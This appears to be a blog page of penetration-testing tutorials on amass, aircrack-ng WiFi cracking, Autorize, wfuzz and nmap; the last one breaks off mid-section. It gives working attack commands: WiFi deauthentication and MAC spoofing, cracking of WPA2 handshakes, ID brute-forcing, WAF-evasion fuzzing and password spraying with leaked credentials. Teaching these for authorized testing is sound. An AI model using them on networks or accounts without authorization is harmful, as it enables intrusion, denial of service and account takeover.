Tag: tool

  • Practical amass – How I configure and use amass in my recon flow

    Practical amass – How I configure and use amass in my recon flow

    If you’re into recon, you’ve probably heard of amass. It’s a powerful tool for mapping attack surfaces during bug bounty hunting or penetration testing. Here’s why I love it:

    • It’s close to an all-in-one recon tool.
    • It aggregates data from multiple resources (DNS, ASN, Whois, etc.).
    • Its capabilities can be extended with API keys.
    • It stores all data in a SQLite database, making information management and querying easier than relying on text files.

    Instead of repeating what’s already in the official tutorial, I’ll take you through how I use Amass in my bug bounty recon workflow.

    Global Configuration

    Once you install amass, the first step is setting up its configuration files. For me, these live in:

    ~/.config/amass/

    Inside this directory, I do the following:

    1. Create the Required Files

    • datasources.yaml: stores API keys.
    • config.yaml: the default configuration file.

    2. Set Up Datasources

    Run the following to see which sources need configuring:

     amass enum -list

    Any source marked with a star requires an API key. Register for as many free resources as possible to maximize Amass’s capabilities. For example, my datasources.yaml file contains:

    datasources:
      - name: Shodan
        creds:
          account:
            apikey: "<key>"
      - name: VirusTotal
        creds:
          account:
            apikey: "<key>"
      - name: SecurityTrails
        creds:
          account:
            apikey: "<key>"
    global_options:
      minimum_ttl: 1440

    3. Link Datasources to the Configuration

    Use config.yaml to reference your datasources file:

    options:
      datasources: <PATH TO>/.config/amass/datasources.yaml

    For a basic setup, this configuration is enough. You can explore more customization options in the OWASP Amass project.

    Workspace Setup

    Before I start working on a program, I create a directory for all of my program-specific work:

    ~/bounties/<program-name>/recon/amass

    This is where I store amass outputs, configuration files, and databases.

    Project-Specific Configuration

    In the amass directory, I maintain a separate config.yaml tailored to the specific program:

    scope:
      domains:
        - example.com
        - example1.com
      ips:
        - 127.0.0.1
      asns:
        - 1234
      blacklist:
        - sensitive.example.com
    options:
      timeout: 5
    

    This keeps Amass focused on the program’s defined scope and prevents unnecessary noise. You can point amass to this project-specific configuration file with the -config flag.

    Root Domain Discovery

    If you’re starting with ASNs, IP ranges, or an organization’s name, the intel command helps find root domains to target:

    amass intel -asn 16839 -dir amass -config recon/config.yaml

    Or, if you already have a domain and want to expand the attack surface:

    amass intel -whois -d example.com -dir amass -config recon/config.yaml

    This performs a reverse whois lookup, gathering related domains.

    Subdomain Discovery

    Once you’ve identified root domains, it’s time to dig deeper with enum:

    amass enum -d example.com -dir amass -config recon/config.yaml

    This will map out subdomains for further analysis.

    By default, amass enum runs passively, meaning it relies solely on third-party sources for information. You can use the -active flag to tell it to interact directly with the target for (potentially) more results and increased accuracy:

    amass enum -active -d example.com -dir amass -config recon/config.yaml

    This will likely take longer to run than the passive option. I recommend starting with passive enumeration, then circling back to active once you’ve exhausted your exploitation efforts.

    It’s also worth noting that amass can perform subdomain brute-forcing. One useful feature is a hashcat-style mask option. I’ll leave that for you to explore in the official tutorial.

    Parsing Gathered Domains

    amass organizes all data in a SQLite database stored in the directory specified by the -dir flag. Using sqlite3, you can query and manage the data:

    $ sqlite3 amass.sqlite
    sqlite> .tables
    assets           gorp_migrations  relations
    

    The assets table is the most relevant, categorizing data into types like FQDN, IPAddress, ASN, and more.

    An example query to extract recent IPv4 addresses:

    SELECT content ->> 'address'
    FROM assets
    WHERE type = 'IPAddress'
      AND json_extract(content, '$.type') = 'IPv4'
    ORDER BY last_seen DESC
    LIMIT 10;
    

    As you can see, using SQLite as the backing store makes it easy to pull exactly what you need and plug it into other tools.

    Why SQLite Beats Legacy Features

    Older versions of Amass supported amass db for queries and amass viz for visualization. While those features were neat, I prefer direct database queries. They give you more control and are easy to script for repeated workflows.

    For example, you could write a script to export all gathered domains and IPs into separate files for further analysis.
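
    Here’s a minimal sketch of such a script, assuming the schema shown above (SQLite 3.38+ for the ->> operator, FQDN assets storing their hostname under a name key, and IP assets storing theirs under an address key):

    #!/usr/bin/env bash
    # Sketch: export discovered hostnames and IPv4 addresses from the amass
    # database into plain-text files that other tools can consume.
    DB="amass/amass.sqlite"

    sqlite3 "$DB" "SELECT DISTINCT content ->> 'name'
                   FROM assets WHERE type = 'FQDN';" > domains.txt

    sqlite3 "$DB" "SELECT DISTINCT content ->> 'address'
                   FROM assets WHERE type = 'IPAddress'
                   AND json_extract(content, '\$.type') = 'IPv4';" > ips.txt

    wc -l domains.txt ips.txt

    From there, domains.txt can feed straight into a resolver or port scanner.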

    Also, the viz feature doesn’t add much value in my opinion. For me, visualizing massive amounts of data would be more overwhelming than useful.

    I’d much rather pull only what stands out to me and throw it in a mind-mapping tool (like xmind). That way, I can work in a less cluttered environment.

    Conclusion

    amass is a game-changer for recon workflows. While setting up API keys may cost some time (and occasionally money), it’s an investment that will give you an edge in bug bounty programs.

    I highly encourage you to experiment with this tool, tweak configurations, and build scripts to fit your needs.

    Happy hunting!

  • How to crack your WiFi network’s password with aircrack-ng

    How to crack your WiFi network’s password with aircrack-ng

    Hello again! If you read my last post on AP and Client discovery with Airodump-ng, then get ready to take the skills you learned to the next level! We’re not just going to be observers anymore. We’re going to hack wireless networks by cracking their passwords!

    This method involves using airodump-ng to capture the traffic needed by the infamous wireless cracking tool, aircrack-ng, to crack passwords using a wordlist. And the best part is, the cracking can be done completely offline!

    Let’s get started!

    Wireless Encryption

    Before we get started with hacking WiFi, there are a few things we have to understand first.

    Wireless Access Points (APs) support a variety of encryption standards: WEP, WPA, WPA2, and WPA3.

    WEP is the weakest and can be cracked quickly without a wordlist. WPA, WPA2, and WPA3 are successive improvements. We’re not going to go into the details; just know that each newer standard offers stronger encryption and other security improvements.

    The encryption standard we are going to focus on is WPA2. It has been around since 2004, and its successor, WPA3, has yet to see widespread adoption (at the time of this writing). If you did some snooping after reading my post about airodump-ng, you might have noticed that the most popular encryption type was WPA2. That’s because it’s the strongest encryption method with broad device support. Your home network is probably encrypted with WPA2, and many businesses use it too.

    We’re also going to be focusing on WPA2/PSK, not the Enterprise variety. PSK stands for Pre-Shared Key; if you’ve ever logged into a WiFi network with a plain-text password, you’ve used PSK. Enterprise requires an additional server, called a RADIUS server, and users authenticate with individual accounts. Businesses use it because it offers centralized control.

    WPA2/PSK is the most common encryption method for a wireless network at the time of this writing. So, you’ll likely have plenty of options to experiment with.

    The 4-way Handshake

    The 4-way handshake occurs every time a client associates with a wireless access point (i.e., a user logs in to the WiFi). The purpose of the handshake is to generate the encryption keys an authorized client needs to communicate with the AP.

    We’re not going to go super in-depth on the protocol behind this but this diagram from a Medium article sums the process up nicely:

    I recommend checking that article out for a pretty decent explanation. This youtube video is also pretty good at explaining the 4-way handshake.

    All you need to know is that when we capture this 4-way handshake, aircrack-ng takes each password guess, derives candidate encryption keys (the PTK and/or GTK) from it together with parameters captured in the handshake, and uses those keys to compute the MIC (Message Integrity Check) over the handshake frame. If the computed MIC matches the MIC in the captured handshake, the guess is correct.

    If you didn’t get all that don’t worry! Seeing this in action might help to clear things up. Even if it doesn’t, it took me a while to understand this process in-depth.

    Capturing the Handshake

    Ok! Onto the fun stuff! The first step in this process is to get that 4-way handshake. To do that we need a couple of things:

    1. a running instance of airodump-ng
    2. a client to associate with the network (a WiFi network you can log in to)

    First, let’s get our network card into monitor mode:

    $ sudo airmon-ng start wlx9cefd5fee020

    Now, our network card is ready to start capturing information. Fire up airodump-ng:

    $ sudo airodump-ng wlan0mon
    
    D8:38:FC:FC:EB:A9  -41        2        0    0   1  130   WPA2 CCMP   PSK  Hack Me

    You can stop here and wait for airodump-ng to capture a handshake from any network within range, or target a specific one. aircrack-ng can recognize multiple handshakes in a capture file and lets you choose from the list you gathered, but I’m going to target a specific network I already have access to:

    $ sudo airodump-ng --bssid D8:38:FC:FC:EB:A9 -c 1 wlan0mon -w ~/Desktop/mywifi
    
     CH  1 ][ Elapsed: 12 s ][ 2023-06-27 16:09 ][ WPA handshake: D8:38:FC:FC:EB:A9 
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
     D8:38:FC:FC:EB:A9  -43   0      105       17    8   1  130   WPA2 CCMP   PSK  Hack Me                                                        
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
     D8:38:FC:FC:EB:A9  18:26:49:74:0B:E4   -6   36e- 6e    21       62  EAPOL

    This process should be pretty familiar to you by now. One difference is that we captured a WPA handshake. airodump-ng handily tells us this in the top right.

    Remember, to capture the handshake we need a client to associate with the AP. In my case, since I already knew the password, I just re-authenticated with my phone.

    If you don’t know the password, you have a couple of options:

    1. Wait until a client re-associates
    2. Force a client to re-associate

    The second option is illegal on networks you don’t own, but I’ll show you how to do it for educational purposes only. Note: your traffic will be logged by the AP and there is a chance you could get caught, so do it at your own risk.

    To force re-authentication on clients, we can kick them off the network with aireplay-ng:

    $ sudo aireplay-ng -0 100 -a D8:38:FC:FC:EB:A9 wlan0mon

    This command will send 100 deauthentication frames (-0 100) to everyone on my network (-a <BSSID>). In other words, I would be DoSing my own network if I ran this.

    To make this a little stealthier, we can target a single client with -c <client MAC> and spoof our MAC address with -h <spoofed MAC>:

    $ sudo aireplay-ng -0 3 -a D8:38:FC:FC:EB:A9 -c 27:18:C2:1B:0B:A4 -h 44:28:78:90:C1:68 wlan0mon

    Whichever route you go, you should now have captured a handshake and written the captured data to a file. I saved mine to ~/Desktop/mywifi. Let’s open Wireshark to see what the handshake looks like:

    The protocol used for the handshake is EAPOL, so I filtered my results to display only the handshake. As expected, there are four of them.

    Cracking the password

    The moment we’ve all been waiting for…Now we get to crack the password!

    At this point, we’ve gathered everything we need to start our attack. If you haven’t done so already, you can take your network card out of monitor mode and shut down airodump-ng:

    $ sudo airmon-ng stop wlan0mon

    To crack my network’s password, I’m going to use the infamous rockyou.txt wordlist. It’s a staple in CTFs and other hacking challenges involving password cracking, and it even comes preinstalled in some hacking-focused Linux distributions like Kali Linux. So, if your password shows up in rockyou, I suggest you change it…
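
    On Kali, rockyou ships compressed; assuming the stock location, a quick gunzip gets it ready for use:

    $ sudo gunzip /usr/share/wordlists/rockyou.txt.gz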

    To crack the password, all you need to give aircrack-ng is the wordlist and the capture file like so:

    $ aircrack-ng -w /opt/rockyou.txt mywifi-01.cap
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  D8:38:FC:FC:EB:A9  Hack Me             WPA (1 handshake)
    
    Choosing first network as target.
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
    1 potential targets
    
    
    
                                   Aircrack-ng 1.6 
    
          [00:00:02] 18440/10303727 keys tested (10231.10 k/s) 
    
          Time left: 16 minutes, 45 seconds                          0.18%
    
                               KEY FOUND! [ appletree ]
    
    
          Master Key     : 1F 9A CD 80 9E 4A 5D 41 F8 49 28 52 94 D9 5D 5A 
                           C7 6F 5A FC 41 98 74 51 91 F6 E5 E9 FC 22 CC E4 
    
          Transient Key  : 2B 3A 52 BC 76 6A 6A 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    
          EAPOL HMAC     : 24 41 72 F8 5E 04 E4 6F 37 72 24 CC 57 F9 0B E3

    As you can see, it automatically identified the handshake, and since there was only one in the file, it got straight to cracking. It found the password, appletree, in a matter of seconds. Embarrassing…

    We can also see that it was able to calculate the other parameters of the 4-way handshake including the PMK (Master Key), the PTK, and the MIC (EAPOL HMAC).
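
    In fact, you can reproduce the first step of that calculation yourself: the Master Key (PMK) is just PBKDF2-HMAC-SHA1 run over the passphrase, with the ESSID as the salt, 4096 iterations, and 32 bytes of output. Here’s a sketch using OpenSSL’s kdf subcommand (assuming OpenSSL 3.0+; Hack Me and appletree are the ESSID and password from this run):

    # Derive the WPA2 PMK from the passphrase and ESSID
    $ openssl kdf -keylen 32 -kdfopt digest:SHA1 \
        -kdfopt pass:appletree -kdfopt salt:"Hack Me" \
        -kdfopt iter:4096 PBKDF2

    The hex it prints should match the Master Key above. This is exactly what makes dictionary attacks on WPA2/PSK possible: everything except the passphrase is public.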

    And that’s it! Easy peasy, lemon squeezy! Of course, your results will depend on the wordlist you use; if your password is not in the wordlist, you won’t be able to crack it. For a proof of concept, you might want to make a small test wordlist with your WiFi password included (assuming you’re attacking a network you have access to), as shown below.
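
    Building that test list is a one-liner (using the appletree password from this run):

    $ printf 'password123\nappletree\nletmein\n' > test-wordlist.txt
    $ aircrack-ng -w test-wordlist.txt mywifi-01.cap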

    Conclusion

    You now know how to crack WiFi passwords running WPA2/PSK encryption! Give yourself a pat on the back hacker!

    Of course, it goes without saying that if you crack the password of a network and then use that password to get unauthorized access to the network, that is where you cross the line into illegal territory. So please, don’t do that. 🙂

    By all means, try this out 100% passively. See what information you can gather with airodump-ng just by leaving it running in your home for an hour or so. You might be surprised at what you’ve gathered. Then try cracking passwords for fun!

    It’s surprising how many people will opt for insecure passwords. I mean, my own apartment complex’s network opted for one of the weakest passwords in the book… Come on! It’s 2023! No matter how secure a system is, people will always be the weakest link. I changed the BSSID and the ESSID of the network in the examples to avoid legal trouble but their WiFi might as well be public…

    Anyways…Hope you enjoyed this article. I certainly enjoyed writing it! Stay tuned for more and practice responsibly!

  • Make access control bug discovery fast and easy with Autorize

    Make access control bug discovery fast and easy with Autorize

    We’re back from our slight detour to swing back into web app testing! Don’t worry though, I haven’t given up on wireless stuff. More content for that coming soon!

    In this post, I’m going to walk through a demo of my favorite Burp Suite extension: Autorize. Autorize is a plugin that makes testing for access control vulnerabilities easy. You can just let it run in the background as you peruse the web app you’re testing, and it will tell you what can be bypassed automagically!

    So, let’s jump right into the demo.

    Installing Autorize

    Autorize doesn’t come with Burp by default. To use its magical powers, we’re going to have to install it ourselves. Luckily, Burp Suite makes this super easy by hosting it in the BApp Store, which you can find under the Extensions tab. A simple search for “Autorize” will pull it right up:

    Then just click the orange “Install” button. My button says “Reinstall” because I already have it all set up.

    If the button is greyed out, you’ll need to install and configure Jython, because Burp Suite is a Java tool and Autorize is written in Python. To do that, download the Jython standalone JAR. Then go to “Extensions settings” under the “Extensions” tab and add the location of your Jython standalone JAR file like so:

    And now you should be able to run Autorize!

    Demo Time

    For demonstration purposes, I’m going to be testing an instance of OWASP Juiceshop running locally. If you haven’t heard of it, Juiceshop is a web app built with modern web technologies designed to be intentionally vulnerable so that you can practice what you’ve learned. It also has a ton of guided walk-throughs so I highly recommend trying it out if you want to get into web penetration testing.

    Ok, let’s get started. To run Autorize, we need Burp Suite up and proxying our web traffic (no surprise there). For Autorize to auto-magically test for authorization bugs, it needs whatever headers the web app uses for authentication.

    I went ahead and created two accounts for testing: sambamsam1@gmail.com and sambamsam2@gmail.com. To start, I’ll log in as sambamsam1 and grab the header I need to copy over to Autorize:

    OWASP Juice Shop uses bearer tokens for authentication, so I copied the entire Authorization header. Then, over in the new Autorize tab, you can just paste it in:

    And that’s all you need to set up Autorize. Pretty simple really. I like to add some filters to the list to make things easier for me. One of the filters I set up on every run is the “Scope items only” filter. This is essential if you’re testing on a Bug Bounty Program.

    Additionally, I like to add a “URL contains” filter (you can select them from the drop down then add content if needed), if I’m targeting a specific domain or endpoint. If I’m testing an API that makes excessive use of OPTIONS requests, there’s an option to filter those out too.

    Once you’ve got that all setup, logout and log back in as another user (in my case, sambamsam2) and you’re good to go! Click the “Autorize is off” button at the top and it will turn bright blue to indicate that everything is running.

    Now, all you have to do is browse the application like a user normally would. In this example, I added an item to my shopping cart as my sambamsam2 user.

    Popping back over to the Autorize tab, you’ll see a ton of requests pile up:

    The two colored columns tell us whether each request succeeded with the temporary header (our other user’s authentication) and whether it succeeded without any authentication at all. A lot of these requests aren’t of any interest to us. However, request 4 stood out to me because it had a simple numerical ID associated with it and appeared to be accessible by our other user.

    We can right-click the request and send it to the Repeater (or Ctrl+R) for a closer look.

    In the Repeater tab, we can verify that the request is successfully being sent with the authorization token of our logged out user:

    And it looks like any logged-in user can access another user’s shopping cart just by adding the correct ID to the URL. This vulnerability is known as an Insecure Direct Object Reference (IDOR), and its severity varies with the predictability of the ID and the confidentiality of the data. In our case, the items in a user’s shopping cart aren’t as revealing as an address or social security number, but a single-digit numeric ID is easily guessed, making this a bug of medium severity.

    I used jwt_tool in my terminal window to verify that the JWT in the request belonged to my other user, sambamsam1. jwt_tool is great for conveniently dissecting JWTs, but it can also be used for exploiting the technology behind them. Maybe I’ll have to do a tutorial on that…
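
    If you want to try it, decoding a token is a one-liner (a sketch assuming you’ve cloned the jwt_tool repo; the token below is a truncated placeholder):

    $ python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<payload>.<signature>

    It prints the decoded header and payload, so you can see exactly which account a token belongs to.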

    Conclusion

    As you can hopefully see, Autorize makes testing for authorization vulnerabilities extremely easy. With Autorize, all you have to do is casually browse the application while it runs in the background.

    I used to have to go back and copy headers to every request I thought was interesting and resend the request every time I wanted to verify an IDOR or some other similar vulnerability. Now I can let it run while I explore or do other testing. Just don’t forget to check back every once in a while or you’ll have tons of requests to dig through.

    Autorize helped me find my first paid bug: a privilege escalation that enabled IDORs. I found a JWT that seemed to belong to an admin user and used Autorize to see what it gave me access to.

    Hope you add this tool to your arsenal and that it helps you as much as it’s helped me! Stay tuned for more hacking tutorials coming soon!

  • Harnessing the power of wfuzz for web hacking

    Harnessing the power of wfuzz for web hacking

    In today’s post, I’ll introduce you to a tool that should be part of every bug hunter’s toolkit: wfuzz! I use wfuzz in every bug bounty program I participate in. If you don’t know what wfuzz is, it’s a web application fuzzer. And if you haven’t heard of web application fuzzers, they’re a type of tool that automates web requests.

    As you’ll see in this post, fuzzers are simple yet extremely powerful tools, and by the end of this post you’ll be able to confidently use wfuzz, one of the best in the game!

    Practical Examples

    Instead of teaching you the syntax, I’m going to run you through a series of hypothetical, real-world examples so you can use it in your next pentest or bug hunt.

    For simplicity, I’m going to use a popular repository of wordlists called SecLists. These wordlists were put together by a few well-known security professionals including Daniel Miessler and Jason Haddix. I highly recommend you check out the repo and get familiar with what’s in some of the lists.

    Directory Discovery

    Discovering hidden files or directories of a web application can be a gold mine for security testers. wfuzz makes this a snap by fuzzing the target URL:

    wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ"

    Let’s break this down:

    • -c, colored output to make output easier to read
    • -w, the specified wordlist
    • -u, the url to fuzz

    You might have noticed the word FUZZ in the URL. This is the keyword that tells wfuzz where to fuzz, i.e., where to substitute each line from the wordlist.

    In this example, the output would look something like this:

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************
    
    Target: https://example.com/FUZZ
    Total requests: 20116
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================
    
    000000007:   404        0 L      0 W      0 Ch        "cache"
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000009:   404        0 L      0 W      0 Ch        "js"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    000000002:   404        0 L      0 W      0 Ch        "images"
    ...

    As you can see, wfuzz neatly prints out the response code, payload used, as well as the number of lines, words, and characters in the response.

    To make the output a little cleaner, I can filter it based on any of the response attributes, like status code:

    $ wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --sc 200
    
    ...
    
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    ...

    Now only responses with status code 200 are shown. We can also use --sl, --sw, or --sh followed by a number to show only responses with a specific number of lines, words, or characters, or --ss followed by a regex to show only responses that match it.

    Alternatively, you can swap the s for an h (--hc, --hl, --hw, --hh, --hs) to hide matches rather than show them.
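
    For example, hiding the inevitable flood of 404s is often more practical than whitelisting status codes (same scan, inverted filter):

    $ wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --hc 404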

    One-liners like these can lead to some big finds, including configuration files, admin logins, and much more, depending on the wordlist.

    Wordlist Contexts

    A little bit of recon with a tool like Wappalyzer can go a long way. Knowing the Content Management System (think WordPress or Drupal), API endpoint locations, etc. can lead to more findings.

    For example, if I knew my target was running on top of an Nginx server, I might use a wordlist catered towards default files and directories:

    wfuzz -c -w nginx.txt -u "https://example.com/FUZZ" --sc 200,403

    If you uncovered an API endpoint, you can use a wordlist of common object names (like user, team, admin, etc.):

    wfuzz -c -w /api/objects.txt -u "https://api.example.com/v2/FUZZ" --hl 4037

    Using a wordlist that fits the situation makes it more likely that you’ll find something interesting. Don’t just blindly throw random wordlists around; there’s no one wordlist to rule them all!

    Subdomain Bruteforcing

    Finding subdomains is key to expanding your attack surface. More often than not, the most interesting subdomains aren’t found passively.

    wfuzz can fuzz anywhere the FUZZ keyword is located in a request, including in headers.

    To bruteforce subdomains with wfuzz, fuzz in the Host header:

    wfuzz -c -w /Discovery/DNS/deepmagic.com-prefixes-top500.txt -H "Host: FUZZ.example.com" -u "https://example.com"

    While wfuzz is capable, sometimes using a tool that is specifically built for this (like gobuster or amass) might be easier and yield better results.

    IDOR

    wfuzz offers a variety of payloads that can be used to fuzz with, including a list of numbers.

    If I stumbled upon an id parameter in JSON that used a guessable four-digit number, I might fuzz it like so to see if I can access any accounts I don’t own:

    wfuzz -c -z range,0000-9999 -X POST -H "Content-type: application/json" "https://example.com/myaccount" -d '{"id": "FUZZ"}'

    The -z parameter specifies a payload type and its options. You can see the full list of payloads with wfuzz -e payloads.

    You might also notice that I changed the method from the default GET to POST with the -X option and added a body to my request with -d. This syntax should be familiar to you if you’ve ever used curl before. Another reason why I love wfuzz!

    Injection

    If you’ve ever tested for injection vulnerabilities (like SQLi or command injection) then it is likely that your attempts have been blocked by a WAF (Web Application Firewall). WAFs are all fine and dandy but they’re not perfect.

    It can be useful to fuzz common payloads to see if any slip through the cracks:

    wfuzz -c -w Fuzzing/XSS/XSS-Somdev.txt -u "https://example.com?q=FUZZ" --hc 403

    In this example, I used a Cross-site Scripting (XSS) wordlist to see if any common payloads weren’t blocked. This likely will not lead to a XSS bug right away, but might clue me in on what keywords or encoding methods might allow me to build a working payload.

    If you’re into finding XSS bugs, fuzzing with Portswigger’s XSS Cheat Sheet can help you see what HTML tags and events are permitted so you can get an idea of how to build your own payload.

    Password Spraying

    Database leaks for a specific target can be a great asset when testing login pages, but with thousands of accounts to choose from, it can be hard to find valid credentials. Luckily, wfuzz can do this much faster than we can.

    Password spraying is the act of guessing the password of many different accounts (not just one like in brute-force attacks). To achieve this, you need to tell wfuzz to fuzz in two separate locations each with its own payload like so:

    wfuzz -c -m zip -w users.txt -w passwords.txt -X POST -u "https://example.com" -d "username=FUZZ&password=FUZ2Z" --sc 302

    For fuzzing multiple locations with different payloads, you need to supply FUZ<payload #>Z. In this example FUZZ is associated with users.txt and FUZ2Z with passwords.txt.

    I also supplied an iterator type of zip with the -m argument. The zip iterator matches the payloads to each other 1-to-1, so it is perfect for password spraying. If you’ve used Burp’s Intruder before, the zip iterator is just like Intruder’s Pitchfork attack type.

    We can list the other iterator types with the -e option (wfuzz -e iterators), just like we did for payloads.

    Wrapping it all up

    wfuzz does one thing (and only one thing) well: spit out a bunch of requests really fast. It’s up to you to make it an effective hacking tool.

    That means choosing the right wordlist for the job. There are tons of wordlists out there for different purposes, so don’t limit yourself to SecLists. It’s a great collection and popular for a reason, but its popularity means a lot of other hunters are using it too, so you’ll likely stumble across the same bugs they do.

    So, Google around and find wordlists that work for you. Or, better yet, make your own as you hunt!

    Also, don’t go fuzzing around unless the program allows it. Sometimes there’s a request-delay requirement, and other times companies won’t permit the use of automated tools at all. Read the policy carefully! Otherwise, you may end up overwhelming the company’s servers.

    Now, you have most of what you need to unleash the power of wfuzz and hunt more efficiently! Happy hunting!

  • Nmap Basics

    Nmap Basics

    If there’s one tool every penetration tester should know, it’s nmap. In this post, I’m going to teach you how to use it practically, as one might in a real-world testing scenario.

    Don’t let the title fool you. Although we’re going to cover the basics here, we’re going to take a deeper dive into how to use this tool effectively. So, I’ll assume you have at least a basic understanding of the Internet and the protocol stack.

    Overview

    nmap is an open-source command line tool used to discover hosts connected to a network and expose what services might be listening on those hosts. It is extremely popular because it can map an entire network automatically, while also being flexible.

    I’m going to expose you to the more technical features of the tool while teaching you the basics so that you can use it flexibly and confidently. So, let’s jump into it!

    Host Discovery

    The first step in testing a network is figuring out which hosts (computers connected to the network) are up and running. After all, computers need to be powered on and connected to the same network we’re on for us to be able to attack them. We also don’t want to blindly spray exploits at all addresses; that’s just noisy and a waste of time.

    Getting started with host discovery in nmap is as simple as running it with a range of IPs (or a single hostname/IP):

    $ nmap 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 13:51 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.00070s latency).
    Not shown: 999 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    53/tcp open  domain
    
    Nmap scan report for 192.168.186.71
    Host is up (0.0021s latency).
    Not shown: 997 closed tcp ports (conn-refused)
    PORT    STATE SERVICE
    22/tcp  open  ssh
    53/tcp  open  domain
    389/tcp open  ldap
    
    Nmap scan report for 192.168.186.93
    Host is up (0.0019s latency).
    Not shown: 999 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0023s latency).
    Not shown: 977 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    53/tcp   open  domain
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    5432/tcp open  postgresql
    5900/tcp open  vnc
    6000/tcp open  X11
    6667/tcp open  irc
    8009/tcp open  ajp13
    8180/tcp open  unknown
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 14.55 seconds

    I used the range 192.168.186.0/24, which is the equivalent of 192.168.186.0-255, the subnet of my virtual network. As you can see, it produced quite a bit of output. I just wanted to see which hosts were online, but nmap went ahead and did a TCP connect port scan on the top 1000 common ports as well.

    This is nice and all but it clutters up my terminal with more than I needed. We can use the -sn option to tell nmap not to do a port scan:

    $ nmap -sn 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 13:57 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0032s latency).
    Nmap scan report for 192.168.186.71
    Host is up (0.0019s latency).
    Nmap scan report for 192.168.186.93
    Host is up (0.0013s latency).
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0042s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.32 seconds

    Much better. If you notice at the bottom of the scan, this was performed much faster (2.32 seconds vs 14.55 seconds in the first scan). This might seem marginal at first but imagine scanning a much larger network (like a business network).

    By default, nmap uses a variety of methods to determine if a host is online. Let’s check this out by scanning a single host:

    $ sudo nmap -sn -vv ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:01 PDT
    Initiating ARP Ping Scan at 14:01
    Scanning ms2 (192.168.186.131) [1 port]
    Completed ARP Ping Scan at 14:01, 0.04s elapsed (1 total hosts)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up, received arp-response (0.0013s latency).
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
               Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

    I used the -vv option to make nmap spit out very verbose output so it can tell us what it’s doing step by step. ms2 is a hostname I configured my system to recognize as 192.168.186.131 (my metasploitable instance). As I mentioned earlier, you can supply nmap with a human-readable hostname and it will automatically go out and resolve the IP address for you.

    Reading the output, we can see that nmap ran an ARP ping scan and, as soon as it completed, deemed the host up. nmap can use a variety of methods to discover a host, including:

    • ARP scan (local network only)
    • ICMP echo request
    • sending a TCP SYN packet to port 443
    • sending a TCP ACK packet to port 80
    • sending an ICMP timestamp request

    If these methods all fail, the host is considered offline. Those of you with keen eyes will notice that I ran nmap with sudo. That’s because nmap relies on packet crafting for some of its scans, which requires root-level privileges. Let’s see what happens when we run it without sudo:

    $ nmap -vv -sn ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:00 PDT
    Initiating Ping Scan at 14:00
    Scanning ms2 (192.168.186.131) [2 ports]
    Completed Ping Scan at 14:00, 0.00s elapsed (1 total hosts)
    Nmap scan report for ms2 (192.168.186.131)
    Host is up, received syn-ack (0.0020s latency).
    Nmap done: 1 IP address (1 host up) scanned in 0.00 seconds

    This time, nmap performed a ping scan instead of an ARP scan, along with a TCP probe. The TCP probe received a SYN-ACK, which is how nmap was able to tell the system was online. It’s important to take this into account, as it could lead to false negatives while testing (what if the host blocks ICMP traffic and the probed ports?).

    So, I would encourage you to use sudo to get the most out of nmap. You’ll definitely need it when I talk about performing different types of host discovery in the next few sections.

    ARP Scanning

    The first method of host discovery I’m going to talk about is ARP scanning. ARP, or Address Resolution Protocol, resolves IP addresses into MAC addresses. This protocol sits low on the stack, which means it has low overhead (less data per packet), giving it two key advantages when used for scanning:

    1. It’s faster.
    2. It’s stealthier (it may slip past firewalls/IDSs).

    The only caveat is that it only works on local networks (can’t scan over the internet). So, know what context you’re scanning in!

    We can perform an ARP scan with nmap by explicitly requesting ARP pings with the -PR option:

    $ sudo nmap -sn -PRn 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 14:59 PDT
    Nmap scan report for 192.168.186.1
    Host is up (0.0013s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.186.2
    Host is up (0.00045s latency).
